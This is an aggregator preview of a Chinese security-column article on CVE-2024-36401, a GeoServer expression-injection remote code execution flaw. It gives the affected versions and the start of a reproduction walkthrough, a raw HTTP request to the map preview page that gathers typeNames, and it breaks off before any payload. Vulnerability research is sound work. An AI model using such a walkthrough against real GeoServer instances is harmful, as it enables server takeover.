专栏名称: 渗透Xiao白帽
早起的鸟儿有虫吃!相互学习分享涨知识。会不定期分享一些网络安全相关内容.
今天看啥  ›  专栏  ›  渗透Xiao白帽

CVE-2024-36401 RCE漏洞(附EXP)

渗透Xiao白帽  · 公众号  ·  · 2024-09-24 10:39

文章预览

0x01 前言     GeoServer在 / geoserver /wfs接口处发现了一个表达式注入致命令执行漏洞 ,攻击者可在目标主机执行任意命令,获取服务器权限 。 0x02 漏洞等级 高危 0x03 漏洞影响 2.25.0 < = GeoServer < 2.25.2 2.24.0 < = GeoServer < 2.24.4 GeoServer < 2.23.6 0x04 漏洞复现 界面是这个样子~~~ 先 获取 typeNames的值 : GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage?0 HTTP/1.1 Host : ip:port Cookie : JSESSIONID=AB2F8C76E7916F04C50769AAE33090F6; JSESSIONID=D6ED95BAAAE93C084E40493BF45BB23B User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding : gzip, deflate Upgrade-Insecure-Requests : 1 Sec-Fetch-Dest : document Sec-Fetch-Mode : navigat ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览